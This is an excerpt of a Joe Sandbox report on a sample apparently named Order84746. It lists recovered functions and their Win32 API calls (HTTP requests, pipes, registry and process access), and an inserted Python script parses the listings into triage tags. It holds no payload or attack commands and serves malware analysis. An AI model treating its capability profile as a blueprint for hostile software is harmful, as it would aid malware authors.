                           • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                          • String ID:
                          • API String ID: 1951874230-3916222277
                          • Opcode ID: 5fff2e16179f9adc210fed8f79e9982e3471e829207128137b4f7aa2c8fb18f1
                          • Instruction ID: d821544bf7b4aeee820e8817ccc9165152ea985c6304738a00a17e5b1a961266
                          • Opcode Fuzzy Hash: 5fff2e16179f9adc210fed8f79e9982e3471e829207128137b4f7aa2c8fb18f1
                          • Instruction Fuzzy Hash: 9221A4B1604208BFE7119F54CC89FBF76FDEB88744F11842AF109D6150DA75AD059B72
                          APIs
                            • Part of subcall function 008FD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 008FD1BA
                            • Part of subcall function 008FD17C: GetStockObject.GDI32(00000011), ref: 008FD1CE
                            • Part of subcall function 008FD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 008FD1D8
                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0094915C
                          • LoadLibraryW.KERNEL32(?), ref: 00949163
                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00949178
                          • DestroyWindow.USER32(?), ref: 00949180
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                           • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                          • String ID: SysAnimate32
                          • API String ID: 4146253029-1011021900
                          • Opcode ID: 136d7cdc72aa8d73299660be69a9423b2e8540d3e88ca2f149f8a8089119de48
                          • Instruction ID: 7079ca4384cddcb15dbf575f0e783c2c30e49752e5649d2da71b5d1bee791b8b
                          • Opcode Fuzzy Hash: 136d7cdc72aa8d73299660be69a9423b2e8540d3e88ca2f149f8a8089119de48
                          • Instruction Fuzzy Hash: C721A171618206BBEF208F64DC85FBB37ADEF9E368F100618FA1492190C771DC41A760
                          APIs
                          • GetStdHandle.KERNEL32(0000000C), ref: 00929588
                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 009295B9
                          • GetStdHandle.KERNEL32(0000000C), ref: 009295CB
                          • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00929605
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                           • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CreateHandle$FilePipe
                          • String ID: nul
                          • API String ID: 4209266947-2873401336
                          • Opcode ID: a492b2528fc0af4758f19abb82d357bc81942cab6bf1fb41aca5a0e09f8e6d1a
                          • Instruction ID: e4201a7624094736f1547ffcbaf1740b4018f60dd8cc8fa1e9d6e89e400ed894
                          • Opcode Fuzzy Hash: a492b2528fc0af4758f19abb82d357bc81942cab6bf1fb41aca5a0e09f8e6d1a
                          • Instruction Fuzzy Hash: 5D219270700225ABEB21AF29EC05E9E77F8AF89724F204A19FCA1D72D4D770D940DB60
                          APIs
                          • GetStdHandle.KERNEL32(000000F6), ref: 00929653
                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00929683
                          • GetStdHandle.KERNEL32(000000F6), ref: 00929694
                          • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 009296CE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                           • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CreateHandle$FilePipe
                          • String ID: nul
                          • API String ID: 4209266947-2873401336
                          • Opcode ID: 2d578528f7878f8f79f4aa4fc109b58dcf127dd27cf22dfe5195bebd00c18401
                          • Instruction ID: 21c50ce9fa323f76e9941b6031cb9511ff16a9c8320021fda6ce6df941d05bbc
                          • Opcode Fuzzy Hash: 2d578528f7878f8f79f4aa4fc109b58dcf127dd27cf22dfe5195bebd00c18401
                          • Instruction Fuzzy Hash: AB218071A002259FDB209F69AC44E9A77ECAF85734F200A19F9B1E72D4E7B4D841CB60
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 0092DB0A
                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0092DB5E
                          • __swprintf.LIBCMT ref: 0092DB77
                          • SetErrorMode.KERNEL32(00000000,00000001,00000000,0097DC00), ref: 0092DBB5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                           • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ErrorMode$InformationVolume__swprintf
                          • String ID: %lu
                          • API String ID: 3164766367-685833217
                          • Opcode ID: 467ac829fe7e906c1f830bffd80ea08412d42c66665cb0eef06b9fc37d3e652c
                          • Instruction ID: 21e60dcfaee45d819775b883fd9e9042d90f819ccc2ff8b58cac2c09b8e7d0c7
                          • Opcode Fuzzy Hash: 467ac829fe7e906c1f830bffd80ea08412d42c66665cb0eef06b9fc37d3e652c
                          • Instruction Fuzzy Hash: 6921B335A00148AFCB10EF69DD85EEEBBB8EF89704B004069F509E7251DBB1EA01CB61
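Each block in this listing is one function the Joe Sandbox IDA plugin recovered from the memory dump: its direct Win32/CRT calls with whatever argument values could be resolved, calls reachable only through subcalls, referenced strings, and two similarity keys (the API ID, derived from the call names, and the Instruction Fuzzy Hash over the function body). A report of this size has thousands of such blocks, so the practical way to use them is to parse them and tag the functions worth opening in a disassembler. The Python below is an added example, not part of the report or of Joe Sandbox: it parses the listing into per-function records and applies a few triage tags. The SAMPLE text, the tag table and the single string xref address in it are constructed for the example. One caveat the report itself supports: the sample is flagged as a compiled AutoIt script and strings such as "AUTOIT.ERROR" and "cdecl$none$stdcall$winapi" belong to the AutoIt runtime, so most of these functions are the interpreter's own capability (HTTP fetch, pipes, COM object creation) rather than evidence of what the embedded script does with it.

```python
"""Parse the per-function API listing of a Joe Sandbox report into triage summaries.

Added example, not Joe Sandbox code. SAMPLE is a constructed excerpt copying the report's
line shapes: an "APIs" header, "• Name.MODULE(args), ref: ADDR" bullets, indented
"Part of subcall function ADDR:" bullets, "Strings" entries and "Similarity" fields.
"""
import re
from collections import OrderedDict

SAMPLE = """\
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00934401
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00934427
• InternetCloseHandle.WININET(00000000), ref: 0093449E
  • Part of subcall function 00935052: GetLastError.KERNEL32(?,?,009343CC), ref: 00935067
Similarity
• API ID: HttpInternet$CloseErrorHandleLastOpenRequestSend
• String ID:
• Instruction Fuzzy Hash: 9221A4B1604208BFE7119F54CC89FBF76FDEB88744F11842AF109D6150DA75AD059B72
APIs
• GetStdHandle.KERNEL32(0000000C), ref: 00929588
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 009295B9
• CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00929605
Similarity
• API ID: CreateHandle$FilePipe
• String ID: nul
• Instruction Fuzzy Hash: 5D219270700225ABEB21AF29EC05E9E77F8AF89724F204A19FCA1D72D4D770D940DB60
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0092DB0A
• GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0092DB5E
• __swprintf.LIBCMT ref: 0092DB77
Strings
• %lu, xrefs: 0092DB70
Similarity
• API ID: ErrorMode$InformationVolume__swprintf
• String ID: %lu
• Instruction Fuzzy Hash: 6921B335A00148AFCB10EF69DD85EEEBBB8EF89704B004069F509E7251DBB1EA01CB61
"""

# A call bullet; the argument list is optional (CRT entries such as __swprintf have none).
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<parent>[0-9A-F]+):\s*)?"
    r"(?P<name>[A-Za-z_][\w:@$?]*)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)
STRING_LINE = re.compile(r"^\s*•\s*(?P<text>.*?), xrefs: (?P<xref>[0-9A-F]+)\s*$")
FIELD_LINE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z][\w ]*?):\s*(?P<value>.*)$")

def parse_functions(text):
    """One record per 'APIs' header: direct calls, subcall calls, strings, Similarity fields."""
    funcs, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = {"apis": [], "subcalls": [], "strings": [], "fields": {}}
            funcs.append(cur)
            continue
        if cur is None:
            continue
        m = API_LINE.match(line)
        if m:
            call = (m["name"], m["module"], m["args"] or "", m["ref"])
            (cur["subcalls"] if m["parent"] else cur["apis"]).append(call)
            continue
        m = STRING_LINE.match(line)
        if m:
            cur["strings"].append((m["text"], m["xref"]))
            continue
        m = FIELD_LINE.match(line)
        if m:
            cur["fields"][m["key"]] = m["value"].strip()
    return funcs

# Triage tags are this example's own heuristics (an assumption), not Joe Sandbox categories.
MODULE_TAGS = {"network": {"WININET", "WINHTTP", "WS2_32"}}
NAME_TAGS = {
    "process-io": {"CreatePipe", "CreateProcessW", "TerminateThread"},
    "com-load": {"CoCreateInstance"},
    "host-fingerprint": {"GetVolumeInformationW"},
}

def classify(func):
    """Tags from direct calls only; subcall entries are shared helpers and would smear tags."""
    tags = set()
    for name, module, _args, _ref in func["apis"]:
        tags.update(t for t, mods in MODULE_TAGS.items() if module in mods)
        tags.update(t for t, names in NAME_TAGS.items() if name in names)
    return tags

def summarize(text):
    """Instruction Fuzzy Hash -> direct API names, tags and String ID. The same hash seen
    from several dumps collapses into one entry, which is the point of keying on it."""
    out = OrderedDict()
    for f in parse_functions(text):
        key = f["fields"].get("Instruction Fuzzy Hash", "?")
        out[key] = {"apis": [c[0] for c in f["apis"]],
                    "tags": sorted(classify(f)),
                    "string_id": f["fields"].get("String ID", "")}
    return out

if __name__ == "__main__":
    for h, info in summarize(SAMPLE).items():
        print(h[:16], info["tags"], ", ".join(info["apis"]), repr(info["string_id"]))
```

To run it over a real report, paste the "Executed Functions" text into SAMPLE or read it from a file; the regexes only depend on the bullet lines, so the Memory Dump Source and Snapshot File lines that repeat under every function are ignored rather than parsed.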
                          APIs
                            • Part of subcall function 0091C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0091C84A
                            • Part of subcall function 0091C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0091C85D
                            • Part of subcall function 0091C82D: GetCurrentThreadId.KERNEL32 ref: 0091C864
                            • Part of subcall function 0091C82D: AttachThreadInput.USER32(00000000), ref: 0091C86B
                          • GetFocus.USER32 ref: 0091CA05
                            • Part of subcall function 0091C876: GetParent.USER32(?), ref: 0091C884
                          • GetClassNameW.USER32(?,?,00000100), ref: 0091CA4E
                          • EnumChildWindows.USER32(?,0091CAC4), ref: 0091CA76
                          • __swprintf.LIBCMT ref: 0091CA90
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                           • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                          • String ID: %s%d
                          • API String ID: 3187004680-1110647743
                          • Opcode ID: c4ab011341d779e980edbd791c6d913b60decc69cbdde6b85f2e29328c7f91ef
                          • Instruction ID: ddee941df387a417469b3c682cfd2fe146b418cee6664f95f19ae2dd950ea9f1
                          • Opcode Fuzzy Hash: c4ab011341d779e980edbd791c6d913b60decc69cbdde6b85f2e29328c7f91ef
                          • Instruction Fuzzy Hash: B91172B17402097BDB11BF648CC5FE9376CAF95714F008066FA18AA182DB709585DB71
                          APIs
                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 009419F3
                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00941A26
                          • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00941B49
                          • CloseHandle.KERNEL32(?), ref: 00941BBF
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                           • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Process$CloseCountersHandleInfoMemoryOpen
                          • String ID:
                          • API String ID: 2364364464-0
                          • Opcode ID: aa10a8fcededfec4e6e15c681f359e470c02f844c43e0b6d8f477eb5e609feed
                          • Instruction ID: ae09b2b1104f6f6762d6c4219d4641d36de1ede715b664986f28a649b374a119
                          • Opcode Fuzzy Hash: aa10a8fcededfec4e6e15c681f359e470c02f844c43e0b6d8f477eb5e609feed
                          • Instruction Fuzzy Hash: 14815F70600214EBDF109F68C896BADBBE9FF48720F148459FA15AF3C2D7B5E9418B91
                          APIs
                          • VariantInit.OLEAUT32(?), ref: 00921CB4
                          • VariantClear.OLEAUT32(00000013), ref: 00921D26
                          • VariantClear.OLEAUT32(00000000), ref: 00921D81
                          • VariantClear.OLEAUT32(?), ref: 00921DF8
                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00921E26
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                           • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Variant$Clear$ChangeInitType
                          • String ID:
                          • API String ID: 4136290138-0
                          • Opcode ID: 426708a33807d7f83f93198a0a27056ae79779102fa4e1b50bf2a444e7457490
                          • Instruction ID: cfade53a929c2289537b6d5043fc27dc461ce8bd726c7c6022249ce1d3e3b1d3
                          • Opcode Fuzzy Hash: 426708a33807d7f83f93198a0a27056ae79779102fa4e1b50bf2a444e7457490
                          • Instruction Fuzzy Hash: 225177B5A00219EFCB14CF58D880AAAB7B8FF8C314B158559ED59DB354E730EA51CFA0
                          APIs
                            • Part of subcall function 008E936C: __swprintf.LIBCMT ref: 008E93AB
                            • Part of subcall function 008E936C: __itow.LIBCMT ref: 008E93DF
                          • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 009406EE
                          • GetProcAddress.KERNEL32(00000000,?), ref: 0094077D
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0094079B
                          • GetProcAddress.KERNEL32(00000000,?), ref: 009407E1
                          • FreeLibrary.KERNEL32(00000000,00000004), ref: 009407FB
                            • Part of subcall function 008FE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0092A574,?,?,00000000,00000008), ref: 008FE675
                            • Part of subcall function 008FE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0092A574,?,?,00000000,00000008), ref: 008FE699
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                           • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                          • String ID:
                          • API String ID: 327935632-0
                          • Opcode ID: b31d787bf5a47b40f0259cc84534ec19ce98a1914e823de9357a278f2c4da1ab
                          • Instruction ID: a852f9d62a48b59152fcf6103c9ac7624589b7b4b4e3bf778c6b8287e305100a
                          • Opcode Fuzzy Hash: b31d787bf5a47b40f0259cc84534ec19ce98a1914e823de9357a278f2c4da1ab
                          • Instruction Fuzzy Hash: 16516975A00249DFCB00EFA8C981DADB7B5FF99310B058059EA15EB352DB74ED46CB82
                          APIs
                            • Part of subcall function 00943C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00942BB5,?,?), ref: 00943C1D
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00942EEF
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00942F2E
                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00942F75
                          • RegCloseKey.ADVAPI32(?,?), ref: 00942FA1
                          • RegCloseKey.ADVAPI32(00000000), ref: 00942FAE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                           • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                          • String ID:
                          • API String ID: 3740051246-0
                          • Opcode ID: 8d81a930bba919674cafbfb0f675c664c240e892ad647b58df35bd82f8b727d7
                          • Instruction ID: ea4e236dac698fcd0b6a95774501cdee94906fdc6022df3fa0bfa1d9a10edb94
                          • Opcode Fuzzy Hash: 8d81a930bba919674cafbfb0f675c664c240e892ad647b58df35bd82f8b727d7
                          • Instruction Fuzzy Hash: 34517871608244AFD704EF68CC81E6ABBF8FF89314F80885DF595972A1DB70E909DB52
                          APIs
                          • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00938E7C
                          • WSAGetLastError.WS2_32(00000000), ref: 00938E89
                          • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 00938EAD
                          • _strlen.LIBCMT ref: 00938EF7
                          • WSAGetLastError.WS2_32(00000000), ref: 00938F6A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                           • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ErrorLast$_strlenselect
                          • String ID:
                          • API String ID: 2217125717-0
                          • Opcode ID: ddbbbcaf8aa4fed0a50a03849979ad9958fbe674059c613121e686b1a4673b7f
                          • Instruction ID: 22d40f3b46d0729c7226a7cb766e5193a70d357243cbece8d901ef173792da89
                          • Opcode Fuzzy Hash: ddbbbcaf8aa4fed0a50a03849979ad9958fbe674059c613121e686b1a4673b7f
                          • Instruction Fuzzy Hash: D941C071A00204AFCB14EBA9DD85EAEB7BEEF48310F104659F11AD7291DF70AE04CB61
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                           • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 569f158a5e46c6465ec0cc7d076658d0a18ad0750f9836edfd8a2f5818f51b4d
                          • Instruction ID: bb87efa8cb2eee3242c45dc5d5d8bab76c54bc80ca5ae0ce0f2910c39948274f
                          • Opcode Fuzzy Hash: 569f158a5e46c6465ec0cc7d076658d0a18ad0750f9836edfd8a2f5818f51b4d
                          • Instruction Fuzzy Hash: F641C6B9E06214AFC760DF68CC44FAABF6CEB09350F140265F969E72E1C774AD01DA90
                          APIs
                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 009312B4
                          • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 009312DD
                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0093131C
                            • Part of subcall function 008E936C: __swprintf.LIBCMT ref: 008E93AB
                            • Part of subcall function 008E936C: __itow.LIBCMT ref: 008E93DF
                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00931341
                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00931349
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                           • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                          • String ID:
